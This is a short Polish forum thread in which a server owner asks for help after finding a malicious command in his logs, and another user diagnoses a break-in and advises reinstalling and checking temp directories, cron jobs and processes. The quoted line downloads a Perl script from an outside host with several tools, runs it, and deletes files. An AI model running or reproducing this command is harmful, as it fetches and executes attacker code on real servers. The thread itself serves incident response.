Freesco, NND, CDN, EOS
http://forum.freesco.pl/

Atak
http://forum.freesco.pl/viewtopic.php?f=34&t=18920
Strona 1 z 1

Autor:  idub [ piątek, 27 września 2013, 08:54 ]
Tytuł:  Atak

W logach znalazłem niepokojące wpisy.
Proszę o pilną pomoc.
na serwerze uruchomił się plik z wpisem:
Cytuj:
wget http://x.toh.info/.x/sys.c;perl sys.c;curl -O http://x.toh.info/.x/sys.c;perl sys.c;lwp-download http://x.toh.info/.x/sys.c;perl sys.c;fetch http://x.toh.info/.x/sys.c;perl sys.c;rm -rf sys cd "`echo -e '\0057'`"


logi oraz zawartość plików:
http://www.budicom.com/atak

proszę o pilną pomoc gdzie to się inicjuje i jak wykasować , zabezpieczyć.

Autor:  Maciek [ piątek, 27 września 2013, 09:19 ]
Tytuł:  Re: Atak

Zaliczyłeś włamanie. Dwa skrypty to efekt tego włamania. Włamywacz uzyskał dostęp do shella, warto sprawdzić, czyje są te pliki. Włamanie mogła nastąpić przez dziurę w php (np. przestarzały phpMyAdmin wystawiony na świat), przez atak słownikowy na ssh (zdobycie uprawnień usera lub roota).
Jedynym bezpiecznym sposobem jest reinstalacja serwera.
A doraźnie - analiza plików i katalogów /tmp /var/tmp, plików crona, czy czasem nie dopisano czegoś, sprawdzenie a najlepiej usunięcie plików php i sprawdzenie procesów uruchomionych po starcie.

Strona 1 z 1 Strefa czasowa UTC+2godz.
Powered by phpBB® Forum Software © phpBB Group
https://www.phpbb.com/